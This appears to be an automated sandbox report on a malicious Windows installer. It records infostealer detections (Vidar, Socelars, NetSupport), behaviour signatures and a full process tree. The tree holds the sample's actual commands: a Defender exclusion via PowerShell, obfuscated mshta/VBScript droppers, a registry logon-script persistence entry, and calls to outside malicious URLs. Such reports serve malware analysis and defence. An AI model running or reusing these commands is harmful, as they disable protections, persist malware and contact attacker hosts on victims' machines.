Resubmissions
02-12-2021 07:35
211202-je6zgsfge4 1010-09-2021 20:31
210910-za2rzaaeh3 1010-09-2021 19:40
210910-ydvmdsdffp 1010-09-2021 12:06
210910-n9s4bsdbep 1010-09-2021 05:37
210910-gbjcxahdh2 1009-09-2021 22:16
210909-17av7aghb7 1009-09-2021 22:12
210909-14mqksgha9 1009-09-2021 22:12
210909-14l42sgha8 1009-09-2021 22:11
210909-14e1qsgha7 1009-09-2021 22:11
210909-138lnacacn 10Analysis
-
max time kernel
246s -
max time network
611s -
platform
windows11_x64 -
resource
win11 -
submitted
09-09-2021 22:12
General
-
Target
setup_x86_x64_install.exe
-
Size
4.3MB
-
MD5
6d18c8e8ab9051f7a70b89ff7bb0ec35
-
SHA1
265311e2afd9f59e824f4b77162cf3dfa278eb7e
-
SHA256
8fe6c86b038ce91a991fe6eb8a9b323bb37b554ff6b4e5c18de3fe52d4aedf6d
-
SHA512
249bf79dc90d4662b942c7eed2a7b7816b749f6d5f7bc190bba05f826fa143d0b44f58054d8649b8626884c5fcbd1cea8abd625dc701d44b7aaac84fc74e47ff
Score
10/10
Malware Config
Signatures
-
Modifies Windows Defender Real-time Protection settings 3 TTPs
-
NetSupport
NetSupport is a remote access tool sold as a legitimate system administration software.
-
Process spawned unexpected child process 5 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
-
Socelars
Socelars is an infostealer targeting browser cookies and credit card credentials.
-
Socelars Payload 2 IoCs
-
Suspicious use of NtCreateProcessExOtherParentProcess 24 IoCs
-
Vidar
Vidar is an infostealer based on Arkei stealer.
-
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs
-
Vidar Stealer 1 IoCs
-
ASPack v2.12-2.42 7 IoCs
Detects executables packed with ASPack v2.12-2.42
-
Blocklisted process makes network request 52 IoCs
-
Downloads MZ/PE file
-
Drops file in Drivers directory 3 IoCs
-
Executes dropped EXE 64 IoCs
-
Checks BIOS information in registry 2 TTPs 12 IoCs
BIOS information is often read in order to detect sandboxing environments.
-
Loads dropped DLL 64 IoCs
-
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Themida packer 1 IoCs
Detects Themida, an advanced Windows software protection system.
-
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 8 IoCs
-
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Checks whether UAC is enabled 1 TTPs 5 IoCs
-
Enumerates connected drives 3 TTPs 64 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Looks up external IP address via web service 13 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
-
Drops file in System32 directory 16 IoCs
-
Suspicious use of NtSetInformationThreadHideFromDebugger 8 IoCs
-
Suspicious use of SetThreadContext 6 IoCs
-
Drops file in Program Files directory 64 IoCs
-
Drops file in Windows directory 54 IoCs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Program crash 50 IoCs
-
Checks SCSI registry key(s) 3 TTPs 64 IoCs
SCSI information is often read in order to detect sandboxing environments.
-
Checks processor information in registry 2 TTPs 64 IoCs
Processor information is often read in order to detect sandboxing environments.
-
Creates scheduled task(s) 1 TTPs 7 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Enumerates system info in registry 2 TTPs 41 IoCs
-
Kills process with taskkill 6 IoCs
-
Modifies data under HKEY_USERS 64 IoCs
-
Modifies registry class 7 IoCs
-
Modifies system certificate store 2 TTPs 20 IoCs
-
Runs ping.exe 1 TTPs 6 IoCs
-
Script User-Agent 3 IoCs
Uses user-agent string associated with script host/environment.
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
-
Suspicious behavior: SetClipboardViewer 1 IoCs
-
Suspicious use of AdjustPrivilegeToken 64 IoCs
-
Suspicious use of FindShellTrayWindow 64 IoCs
-
Suspicious use of SendNotifyMessage 6 IoCs
-
Suspicious use of SetWindowsHookEx 1 IoCs
-
Suspicious use of WriteProcessMemory 64 IoCs
Processes
-
C:\Users\Admin\AppData\Local\Temp\setup_x86_x64_install.exe"C:\Users\Admin\AppData\Local\Temp\setup_x86_x64_install.exe"1⤵
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\7zS0B3DC483\setup_install.exe"C:\Users\Admin\AppData\Local\Temp\7zS0B3DC483\setup_install.exe"3⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Thu219d5fe8cf316.exe4⤵
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\7zS0B3DC483\Thu219d5fe8cf316.exeThu219d5fe8cf316.exe5⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\ProgramData\5866961.exe"C:\ProgramData\5866961.exe"6⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 2140 -s 23207⤵
- Program crash
-
-
-
C:\ProgramData\4566244.exe"C:\ProgramData\4566244.exe"6⤵
- Executes dropped EXE
- Adds Run key to start application
-
C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe"C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe"7⤵
- Executes dropped EXE
-
-
-
C:\ProgramData\4887212.exe"C:\ProgramData\4887212.exe"6⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5500 -s 3167⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
-
-
-
C:\ProgramData\2868447.exe"C:\ProgramData\2868447.exe"6⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
-
C:\ProgramData\5605956.exe"C:\ProgramData\5605956.exe"6⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
-
C:\ProgramData\1704503.exe"C:\ProgramData\1704503.exe"6⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vBSCRIPT: cLOsE ( creatEoBjECT ( "wScRiPt.shELl" ). RuN ("CMD /c TypE ""C:\ProgramData\1704503.exe"" > gZ9~4qZ~O.EXE&& StarT GZ9~4QZ~O.EXe -P6_oIH__Ioj5q & if """" =="""" for %B iN ( ""C:\ProgramData\1704503.exe"" ) do taskkill /Im ""%~NxB"" /F " , 0 , tRUe ) )7⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c TypE "C:\ProgramData\1704503.exe"> gZ9~4qZ~O.EXE&& StarT GZ9~4QZ~O.EXe -P6_oIH__Ioj5q & if "" =="" for %B iN ( "C:\ProgramData\1704503.exe" ) do taskkill /Im "%~NxB" /F8⤵
-
C:\Users\Admin\AppData\Local\Temp\gZ9~4qZ~O.EXEGZ9~4QZ~O.EXe -P6_oIH__Ioj5q9⤵
- Executes dropped EXE
- Suspicious use of FindShellTrayWindow
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vBSCRIPT: cLOsE ( creatEoBjECT ( "wScRiPt.shELl" ). RuN ("CMD /c TypE ""C:\Users\Admin\AppData\Local\Temp\gZ9~4qZ~O.EXE"" > gZ9~4qZ~O.EXE&& StarT GZ9~4QZ~O.EXe -P6_oIH__Ioj5q & if ""-P6_oIH__Ioj5q "" =="""" for %B iN ( ""C:\Users\Admin\AppData\Local\Temp\gZ9~4qZ~O.EXE"" ) do taskkill /Im ""%~NxB"" /F " , 0 , tRUe ) )10⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c TypE "C:\Users\Admin\AppData\Local\Temp\gZ9~4qZ~O.EXE"> gZ9~4qZ~O.EXE&& StarT GZ9~4QZ~O.EXe -P6_oIH__Ioj5q & if "-P6_oIH__Ioj5q " =="" for %B iN ( "C:\Users\Admin\AppData\Local\Temp\gZ9~4qZ~O.EXE" ) do taskkill /Im "%~NxB" /F11⤵
-
-
-
C:\Windows\SysWOW64\regsvr32.exe"C:\Windows\System32\regsvr32.exe" T~DJNB.F -u /S10⤵
- Loads dropped DLL
-
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /Im "1704503.exe" /F9⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
-
-
-
C:\ProgramData\375096.exe"C:\ProgramData\375096.exe"6⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5416 -s 25007⤵
- Executes dropped EXE
- Loads dropped DLL
- Drops file in Program Files directory
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Thu21624565bb917a.exe4⤵
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\7zS0B3DC483\Thu21624565bb917a.exeThu21624565bb917a.exe5⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1344 -s 3166⤵
- Program crash
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Thu21a1ef054cac78a.exe4⤵
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\7zS0B3DC483\Thu21a1ef054cac78a.exeThu21a1ef054cac78a.exe5⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2132 -s 19646⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Thu21b93295136197.exe4⤵
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\7zS0B3DC483\Thu21b93295136197.exeThu21b93295136197.exe5⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\is-R2CD5.tmp\Thu21b93295136197.tmp"C:\Users\Admin\AppData\Local\Temp\is-R2CD5.tmp\Thu21b93295136197.tmp" /SL5="$501FA,138429,56832,C:\Users\Admin\AppData\Local\Temp\7zS0B3DC483\Thu21b93295136197.exe"6⤵
- Executes dropped EXE
- Loads dropped DLL
-
C:\Users\Admin\AppData\Local\Temp\is-28MN6.tmp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\is-28MN6.tmp\Setup.exe" /Verysilent7⤵
- Executes dropped EXE
- Drops file in Program Files directory
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://iplis.ru/1S2Qs78⤵
- Adds Run key to start application
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x104,0x108,0x10c,0xe0,0x110,0x7ff86f7446f8,0x7ff86f744708,0x7ff86f7447189⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2232,7752948802953712325,11320122623003756597,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2256 /prefetch:29⤵
- Executes dropped EXE
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2232,7752948802953712325,11320122623003756597,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2332 /prefetch:39⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2232,7752948802953712325,11320122623003756597,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2764 /prefetch:89⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2232,7752948802953712325,11320122623003756597,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3464 /prefetch:19⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2232,7752948802953712325,11320122623003756597,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3480 /prefetch:19⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2232,7752948802953712325,11320122623003756597,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3264 /prefetch:19⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2232,7752948802953712325,11320122623003756597,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4660 /prefetch:19⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.62\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.62\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2232,7752948802953712325,11320122623003756597,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5752 /prefetch:89⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.62\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.62\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2232,7752948802953712325,11320122623003756597,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5752 /prefetch:89⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2232,7752948802953712325,11320122623003756597,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1936 /prefetch:19⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2232,7752948802953712325,11320122623003756597,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5672 /prefetch:19⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2232,7752948802953712325,11320122623003756597,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5436 /prefetch:19⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2232,7752948802953712325,11320122623003756597,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5468 /prefetch:19⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2232,7752948802953712325,11320122623003756597,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=5140 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.22000.1 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=4836 /prefetch:29⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2232,7752948802953712325,11320122623003756597,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5292 /prefetch:19⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=2232,7752948802953712325,11320122623003756597,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5060 /prefetch:89⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2232,7752948802953712325,11320122623003756597,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5440 /prefetch:19⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=2232,7752948802953712325,11320122623003756597,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=1048 /prefetch:89⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2232,7752948802953712325,11320122623003756597,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=20 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5128 /prefetch:19⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2232,7752948802953712325,11320122623003756597,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=21 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5208 /prefetch:19⤵
-
-
-
C:\Program Files (x86)\SmartPDF\SmartPDF\Setup.exe"C:\Program Files (x86)\SmartPDF\SmartPDF\Setup.exe"8⤵
- Executes dropped EXE
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\BSKR.exe"C:\Users\Admin\AppData\Local\Temp\BSKR.exe"9⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Local\Temp\BSKR.exeC:\Users\Admin\AppData\Local\Temp\BSKR.exe10⤵
- Executes dropped EXE
-
-
C:\Users\Admin\AppData\Local\Temp\BSKR.exeC:\Users\Admin\AppData\Local\Temp\BSKR.exe10⤵
- Executes dropped EXE
-
-
-
C:\Users\Admin\AppData\Local\Temp\Mortician.exe"C:\Users\Admin\AppData\Local\Temp\Mortician.exe"9⤵
- Loads dropped DLL
-
C:\Windows\SysWOW64\cmd.exe"cmd" /c cmd < Cerchia.vsdx10⤵
-
C:\Windows\SysWOW64\cmd.execmd11⤵
-
C:\Windows\SysWOW64\findstr.exefindstr /V /R "^JdxmflaMoKJKGKEonRKIDlCuNBztuuxobvTVXbusdtKZTUcnQFZrvdHmOhLNQgGwfAjlQJkqLaammCjTuVhBisMuOxuJLaA$" Attesa.vsdx12⤵
-
-
C:\Windows\SysWOW64\PING.EXEping localhost12⤵
- Runs ping.exe
-
-
C:\Users\Admin\AppData\Roaming\Impedire.exe.comImpedire.exe.com I12⤵
-
C:\Users\Admin\AppData\Roaming\Impedire.exe.comC:\Users\Admin\AppData\Roaming\Impedire.exe.com I13⤵
-
C:\Users\Admin\AppData\Roaming\Impedire.exe.comC:\Users\Admin\AppData\Roaming\Impedire.exe.com I14⤵
-
C:\Users\Admin\AppData\Roaming\Impedire.exe.comC:\Users\Admin\AppData\Roaming\Impedire.exe.com I15⤵
-
C:\Users\Admin\AppData\Roaming\Impedire.exe.comC:\Users\Admin\AppData\Roaming\Impedire.exe.com I16⤵
-
C:\Users\Admin\AppData\Roaming\Impedire.exe.comC:\Users\Admin\AppData\Roaming\Impedire.exe.com I17⤵
-
-
-
-
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\foradvertising.exe"C:\Users\Admin\AppData\Local\Temp\foradvertising.exe" /wws19⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5612 -s 23610⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
-
-
-
C:\Users\Admin\AppData\Local\Temp\gdgame.exe"C:\Users\Admin\AppData\Local\Temp\gdgame.exe"9⤵
- Executes dropped EXE
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\gdgame.exe"C:\Users\Admin\AppData\Local\Temp\gdgame.exe" -a10⤵
-
-
-
C:\Users\Admin\AppData\Local\Temp\installer.exe"C:\Users\Admin\AppData\Local\Temp\installer.exe" /qn CAMPAIGN="710"9⤵
-
C:\Windows\SysWOW64\msiexec.exe"C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\AW Manager\Windows Manager 1.0.0\install\97FDF62\Windows Manager - Postback Y.msi" /qn CAMPAIGN=710 AI_SETUPEXEPATH=C:\Users\Admin\AppData\Local\Temp\installer.exe SETUPEXEDIR=C:\Users\Admin\AppData\Local\Temp\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1630966744 /qn CAMPAIGN=""710"" " CAMPAIGN="710"10⤵
- Enumerates connected drives
-
-
-
C:\Users\Admin\AppData\Local\Temp\IBInstaller_74449.exe"C:\Users\Admin\AppData\Local\Temp\IBInstaller_74449.exe" /VERYSILENT /PASSWORD=kSWIzY9AFOirvP3TueIs74449 -token mtn1co3fo4gs5vwq -subid 7219⤵
-
C:\Users\Admin\AppData\Local\Temp\is-QVVFN.tmp\IBInstaller_74449.tmp"C:\Users\Admin\AppData\Local\Temp\is-QVVFN.tmp\IBInstaller_74449.tmp" /SL5="$700A6,14713126,721408,C:\Users\Admin\AppData\Local\Temp\IBInstaller_74449.exe" /VERYSILENT /PASSWORD=kSWIzY9AFOirvP3TueIs74449 -token mtn1co3fo4gs5vwq -subid 72110⤵
- Loads dropped DLL
- Drops file in Program Files directory
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious use of FindShellTrayWindow
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /c expand C:\Users\Admin\AppData\Local\Temp\is-CGLCJ.tmp\{app}\microsoft.cab -F:* %ProgramData%11⤵
-
C:\Windows\SysWOW64\expand.exeexpand C:\Users\Admin\AppData\Local\Temp\is-CGLCJ.tmp\{app}\microsoft.cab -F:* C:\ProgramData12⤵
- Drops file in Windows directory
-
-
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /c reg add "HKEY_CURRENT_USER\Environment" /v UserInitMprLogonScript /t REG_EXPAND_SZ /d "%ProgramData%\regid.1993-06.com.microsoft\svrwebui.exe" /f11⤵
-
C:\Windows\SysWOW64\reg.exereg add "HKEY_CURRENT_USER\Environment" /v UserInitMprLogonScript /t REG_EXPAND_SZ /d "C:\ProgramData\regid.1993-06.com.microsoft\svrwebui.exe" /f12⤵
-
-
-
C:\ProgramData\regid.1993-06.com.microsoft\svrwebui.exe"C:\ProgramData\regid.1993-06.com.microsoft\svrwebui.exe"11⤵
- Loads dropped DLL
- Suspicious use of FindShellTrayWindow
-
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /c start http://lereknoj24.top/pgudonqntu/zmsaksepfx.php?xdl=mtn1co3fo4gs5vwq^&cid=74449^¶m=72111⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://lereknoj24.top/pgudonqntu/zmsaksepfx.php?xdl=mtn1co3fo4gs5vwq&cid=74449¶m=72112⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ff86f7446f8,0x7ff86f744708,0x7ff86f74471813⤵
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\is-CGLCJ.tmp\{app}\vdi_compiler.exe"C:\Users\Admin\AppData\Local\Temp\is-CGLCJ.tmp\{app}\vdi_compiler"11⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4208 -s 23612⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\vpn.exe"C:\Users\Admin\AppData\Local\Temp\vpn.exe" /silent /subid=7209⤵
-
